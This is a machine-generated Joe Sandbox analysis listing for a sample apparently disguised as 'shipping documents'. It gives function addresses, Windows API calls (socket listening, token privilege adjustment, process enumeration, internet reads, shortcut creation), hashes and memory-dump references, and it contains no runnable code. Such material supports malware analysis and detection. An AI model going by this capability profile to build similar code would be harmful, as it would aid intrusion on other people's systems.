Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: __itow__swprintf
String ID: Oaf
API String ID: 674341424-1555074404
Opcode ID: f6dbbd199544820ea2395af442c6c771e9ab641cba2ce80af32650318f5fc2e2
Instruction ID: 67796402350f97119046eed032c8c6296b223a903ef7b6b363fb2c851ac7205f
Opcode Fuzzy Hash: f6dbbd199544820ea2395af442c6c771e9ab641cba2ce80af32650318f5fc2e2
Instruction Fuzzy Hash: E522AB716183119FCB64DF24C891BABB7EAAF84300F14491DF89A97391DB30EE05CB96

Function 006C6596 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 006C65EF
WSAGetLastError.WSOCK32(00000000), ref: 006C65FE
bind.WSOCK32(00000000,?,00000010), ref: 006C661A
listen.WSOCK32(00000000,00000005), ref: 006C6629
WSAGetLastError.WSOCK32(00000000), ref: 006C6643
closesocket.WSOCK32(00000000,00000000), ref: 006C6657

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: e7367dfbc6c2f870ce6ce20c8e9ebdd583080c484e622a0e2f84b730c981f07f
Instruction ID: 198ae87ad5b515483955de078cc0382ad824feb3fab2c3cba74c650013d2bdf7
Opcode Fuzzy Hash: e7367dfbc6c2f870ce6ce20c8e9ebdd583080c484e622a0e2f84b730c981f07f
Instruction Fuzzy Hash: 7E218D306002049FCB10EF25D845FBEB7AAEF45320F14815EF956A7391CB70AD059B6A

Function 00651287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON

Download Yara Rule

APIs

Part of subcall function 00652612: GetWindowLongW.USER32(?,000000EB), ref: 00652623

DefDlgProcW.USER32(?,?,?,?,?), ref: 006519FA
GetSysColor.USER32(0000000F), ref: 00651A4E
SetBkColor.GDI32(?,00000000), ref: 00651A61

Part of subcall function 00651290: DefDlgProcW.USER32(?,00000020,?), ref: 006512D8

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: ColorProc$LongWindow
String ID:
API String ID: 3744519093-0
Opcode ID: 954e57980a316bddaef14471b182a82ee2a0c55dc232c97e343983df778eaa7f
Instruction ID: e28afea6caf27c5363cb8b2a656bb6ab68df21747e10165963f847fe442359b4
Opcode Fuzzy Hash: 954e57980a316bddaef14471b182a82ee2a0c55dc232c97e343983df778eaa7f
Instruction Fuzzy Hash: 4EA12574106589BAD72AAB289C55FFB259FDB43353F14421AFC02DA3D1CE248D0AD3B9

Function 006C6A5A Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON

Download Yara Rule

APIs

Part of subcall function 006C80A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 006C80CB

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 006C6AB1
WSAGetLastError.WSOCK32(00000000), ref: 006C6ADA
bind.WSOCK32(00000000,?,00000010), ref: 006C6B13
WSAGetLastError.WSOCK32(00000000), ref: 006C6B20
closesocket.WSOCK32(00000000,00000000), ref: 006C6B34

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: ErrorLast$bindclosesocketinet_addrsocket
String ID:
API String ID: 99427753-0
Opcode ID: 9d9e777ccaf4ab9711e4c942c2d25b817164d74aa42932f242d822cc95dce26b
Instruction ID: 9e5b37ed32431ba199740ad44d67451257072389aa40aa0a4f1c3f427ca03782
Opcode Fuzzy Hash: 9d9e777ccaf4ab9711e4c942c2d25b817164d74aa42932f242d822cc95dce26b
Instruction Fuzzy Hash: 9941B175B00214AFEB50AF64DC86F7E77AADB44710F04805DFE1AAB3C2CA709D058BA5

Function 006D55FD Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 006D564C
IsWindowEnabled.USER32 ref: 006D565A
GetForegroundWindow.USER32(?,?,00000001), ref: 006D5667
IsIconic.USER32 ref: 006D5675
IsZoomed.USER32 ref: 006D5683

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: e6abfd8734c26bd3d76f0e1143741ede97b5c1e2d79fcd4fd415b5e525bba8a1
Instruction ID: 5de73ef303e4b8dfc896a59ca824237242cb65d23efefcd06470538dcd6d12d1
Opcode Fuzzy Hash: e6abfd8734c26bd3d76f0e1143741ede97b5c1e2d79fcd4fd415b5e525bba8a1
Instruction Fuzzy Hash: DA11C431B01A506FE7211F26DC44A6F7B9BEF95721F44402AF807D7761CB70D9028AA9

Function 006BC602 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 006BC69D
CoCreateInstance.OLE32(006E2D6C,00000000,00000001,006E2BDC,?), ref: 006BC6B5

Part of subcall function 00657F41: _memmove.LIBCMT ref: 00657F82

CoUninitialize.OLE32 ref: 006BC922

Strings

.lnk, xrefs: 006BC631, 006BC659, 006BC663

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_memmove
String ID: .lnk
API String ID: 2683427295-24824748
Opcode ID: 01307666962097d3b8d1b153cae016678e42bf289c7fd5565c77b5254edb0873
Instruction ID: d44f6e78114689172e52482fd43423a34cf8888d4e7d729e06675f335262b036
Opcode Fuzzy Hash: 01307666962097d3b8d1b153cae016678e42bf289c7fd5565c77b5254edb0873
Instruction Fuzzy Hash: 00A14A71104301AFD740EF64C891EABB7EAEF94305F00491CF596971A2DB70EA49CB66

Function 006CC304 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00691D88,?), ref: 006CC312
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 006CC324

Strings

GetSystemWow64DirectoryW, xrefs: 006CC31E
kernel32.dll, xrefs: 006CC30D

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetSystemWow64DirectoryW$kernel32.dll
API String ID: 2574300362-1816364905
Opcode ID: 23d8eb36be596d8f8466b223e40677f37f32a364fde17e2b74455593b654e642
Instruction ID: c544b44984a1b200d116fd35bd378978731ffbae8c15d92910d565032722b73b
Opcode Fuzzy Hash: 23d8eb36be596d8f8466b223e40677f37f32a364fde17e2b74455593b654e642
Instruction Fuzzy Hash: 4AE08C70A00303CFCB204F25E818F9676D6EB08324B80843EE89EC2350E774D881CBA0

Function 006CF121 Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 006CF151
Process32FirstW.KERNEL32(00000000,?), ref: 006CF15F

Part of subcall function 00657F41: _memmove.LIBCMT ref: 00657F82

Process32NextW.KERNEL32(00000000,?), ref: 006CF21F
CloseHandle.KERNEL32(00000000,?,?,?), ref: 006CF22E

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
String ID:
API String ID: 2576544623-0
Opcode ID: 1d2b72049b7374a2230e668b4874dd24ab285952c4484778d757c2c47047d146
Instruction ID: 8e5a3c2a5072d34f8f1d0ed2ca58a11e2a4db81d394f5225a709c2d84ae08852
Opcode Fuzzy Hash: 1d2b72049b7374a2230e668b4874dd24ab285952c4484778d757c2c47047d146
Instruction Fuzzy Hash: 15517F71504310AFD350EF24DC85E6BB7EAFF98710F14492DF89697291EB70AA08CB96

Function 006AEB07 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 006AEB19

Strings

|, xrefs: 006AEB49
(, xrefs: 006AEB5F

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: 393180fc798510cac9d691166bbeade92a4b6ce94d849e4aeb5b9640644fc81e
Instruction ID: bd626e54c28226316c0c3e731a53bca83e344b7122fb24ac79df3f178ae55f41
Opcode Fuzzy Hash: 393180fc798510cac9d691166bbeade92a4b6ce94d849e4aeb5b9640644fc81e
Instruction Fuzzy Hash: 5C323575A006059FD728DF19C481AAAB7F1FF48320B15C56EE89ACB3A1E770E941CF54

Function 006C25E2 Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 006C26D5
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 006C270C

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: d7859ac5626945d3420c27e6be6f84149639db0262ed3ab5263bba1f06238a87
Instruction ID: 0ed4ccb2572c346b3db4ecc957a624ceb6e27298cae69da4ea6b62364764a065
Opcode Fuzzy Hash: d7859ac5626945d3420c27e6be6f84149639db0262ed3ab5263bba1f06238a87
Instruction Fuzzy Hash: 6A41A27590020ABFEB209B95DCD5FFBB7BEEB40714F10406EFE05A6240EA719E419A64

Function 006BB59E Relevance: 4.6, APIs: 3, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 006BB5AE
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 006BB608
SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 006BB655

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: 6787c6c784f9667111aeb81ab949a357c25341cb3cb15e877a8d9324baeecfd1
Instruction ID: 668573e6a80179df4bbe339b5a8fa87d272bccf8c744003b23a9133bcc15e784
Opcode Fuzzy Hash: 6787c6c784f9667111aeb81ab949a357c25341cb3cb15e877a8d9324baeecfd1
Instruction Fuzzy Hash: D2216275A00118EFCB00EF65DC84EEDBBB9FF48311F1480A9E906AB351DB319955CB55

Function 006A8CC3 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00670FF6: std::exception::exception.LIBCMT ref: 0067102C
Part of subcall function 00670FF6: __CxxThrowException@8.LIBCMT ref: 00671041

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 006A8D0D
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 006A8D3A
GetLastError.KERNEL32 ref: 006A8D47

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: 716630614b69f6396894b7810a66b7cdce16e6ea72129dafe8619f89d6acbfec
Instruction ID: c50dad843cafb3a000f0ff8911ffeca39b08f6f295727ac32ba3d533f826a867
Opcode Fuzzy Hash: 716630614b69f6396894b7810a66b7cdce16e6ea72129dafe8619f89d6acbfec
Instruction Fuzzy Hash: 9411BFB1814208AFE728AF54DC85D6BB7FEEF04710B20852EF84683241EB30BC408E60

Function 006B4021 Relevance: 4.6, APIs: 3, Instructions: 61fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 006B404B
DeviceIoControl.KERNEL32(00000000,002D1400,00000007,0000000C,?,0000000C,?,00000000), ref: 006B4088
CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 006B4091

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: 7d419d4684633c6f2b902ffd2fe2ee435f2b29b0874657393b59ec18ecaa261f
Instruction ID: 99395850684fd2dcc935868a22da925fe25843303af2e963772fbd67aa0a7330
Opcode Fuzzy Hash: 7d419d4684633c6f2b902ffd2fe2ee435f2b29b0874657393b59ec18ecaa261f
Instruction Fuzzy Hash: 961170B1D01228BEE7109BECDC44FFBBBBDEB08710F004656BA05E7291C6745A4587A1

Function 006B4C03 Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 006B4C2C
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 006B4C43
FreeSid.ADVAPI32(?), ref: 006B4C53

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 8cf72e1ded6df46f9ba779ed8265550c91f7bf0d1ead5dcace1145785ab7d5b2
Instruction ID: da73ced628cd9a5bd3f5a7f71cf69480206756aad0a6ead882ec1653a38b1d21
Opcode Fuzzy Hash: 8cf72e1ded6df46f9ba779ed8265550c91f7bf0d1ead5dcace1145785ab7d5b2
Instruction Fuzzy Hash: 21F03C75D11208BBDB04DFE09C99ABDBBB9EB08201F404469A502E2281D6705A448B50

Function 006B8B13 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 006B8B25

Part of subcall function 0067543A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,006B91F8,00000000,?,?,?,?,006B93A9,00000000,?), ref: 00675443
Part of subcall function 0067543A: __aulldiv.LIBCMT ref: 00675463

Strings

0uq, xrefs: 006B8B1C

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: Time$FileSystem__aulldiv__time64
String ID: 0uq
API String ID: 2893107130-2925588635
Opcode ID: f5209424c5378d33a02b4afc1aa240aace4ab630ac7bfc38c51dc8d189f06eb7
Instruction ID: 9defc71a360d2d2f6f3f7999dc37d99b744deb600f158580a5d7ff8e7ca211c4
Opcode Fuzzy Hash: f5209424c5378d33a02b4afc1aa240aace4ab630ac7bfc38c51dc8d189f06eb7
Instruction Fuzzy Hash: BE21A2726255108FC729CF39D841A92B3E6EBA5311B28CE6CD0E5CB2D0CA74B945CB94

Function 0065E060 Relevance: 3.5, APIs: 2, Instructions: 539COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4a5dc2e585d40a81323b3c71ff8cc17ba0276e9770c57aba0829e566957527e
Instruction ID: 826b81f0be31409053bc0239d31bf35c3a0ba4eebe4146808e875414f48fc83c
Opcode Fuzzy Hash: e4a5dc2e585d40a81323b3c71ff8cc17ba0276e9770c57aba0829e566957527e
Instruction Fuzzy Hash: D9228E74A00216CFDF28DF58C480AAEB7F6FF04301F148569EC569B351E776AA89CB91

Function 006BC93C Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 006BC966
FindClose.KERNEL32(00000000), ref: 006BC996

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 92da115f916a9013062e66e93164925c1666e019e9a535027c4d5ad98739d8b2
Instruction ID: 5c795576bffacddee040c9a3fe6f05b678fbf1e37cfd12425736ed1feff663cf
Opcode Fuzzy Hash: 92da115f916a9013062e66e93164925c1666e019e9a535027c4d5ad98739d8b2
Instruction Fuzzy Hash: 6D11C4726002009FDB10EF29C845A6AF7EAFF84321F04851EF8AAD7391DB70AD04CB95

Function 006BA2D5 Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,006C977D,?,006DFB84,?), ref: 006BA302
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,006C977D,?,006DFB84,?), ref: 006BA314

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: fe5a989a8e81b58a4ee51b641a6e30bb7e10b022b3302203146382509ed45c43
Instruction ID: cb7096b2b461c0d7dd637d46cbf870a0390b76993fb0d5e5a1dd91895a0ec1bc
Opcode Fuzzy Hash: fe5a989a8e81b58a4ee51b641a6e30bb7e10b022b3302203146382509ed45c43
Instruction Fuzzy Hash: 4FF0823554522DABDB20AFA4CC48FEA776EBF09761F00426AB909D6181D6309944CBE1

Function 006A8713 Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,006A8851), ref: 006A8728
CloseHandle.KERNEL32(?,?,006A8851), ref: 006A873A

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 55c6bba3ad6cbf70e4dea0966ca6202745fb5393cadd73112629f5206a5baed2
Instruction ID: 6405c4088aa8b43e37d5de1f89b5b656aea784a47dde21cb8e86b2698d7f1092
Opcode Fuzzy Hash: 55c6bba3ad6cbf70e4dea0966ca6202745fb5393cadd73112629f5206a5baed2
Instruction Fuzzy Hash: 19E0B676011610EEE7652B64EC09D77BBEAEB05350725C82EF49A85470DB62ACD0DB50

